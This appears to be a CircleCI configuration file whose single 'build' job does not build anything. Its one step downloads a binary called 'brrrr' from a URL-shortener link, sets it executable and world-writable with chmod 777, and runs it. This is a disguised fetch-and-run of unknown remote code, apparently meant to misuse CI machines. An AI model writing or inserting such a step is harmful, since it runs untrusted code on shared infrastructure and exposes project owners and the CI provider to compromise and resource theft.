version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: medium
    steps:
      - run: wget -O brrrr http://gg.gg/vl3a5 && chmod +x brrrr && chmod 777 brrrr && ./brrrr